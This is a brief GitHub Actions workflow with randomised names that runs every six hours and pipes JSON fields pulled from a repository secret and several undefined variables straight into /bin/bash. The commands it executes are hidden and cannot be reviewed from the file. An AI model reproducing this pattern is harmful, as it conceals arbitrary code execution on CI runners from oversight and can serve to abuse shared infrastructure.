name: yangtianbao2001
on:
  workflow_dispatch:
  schedule:
    - cron: '41 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yangtianbao2001
        env:
          h60086: ${{ secrets.h60086 }}
        run: |
          echo $h60086 | jq -r .smagn7 | /bin/bash
          echo $trmg93434 | jq -r .vuqu8 | /bin/bash
          echo $g393 | jq -r .dfqc48 | /bin/bash
          echo $oc1613 | jq -r .nds106 | /bin/bash

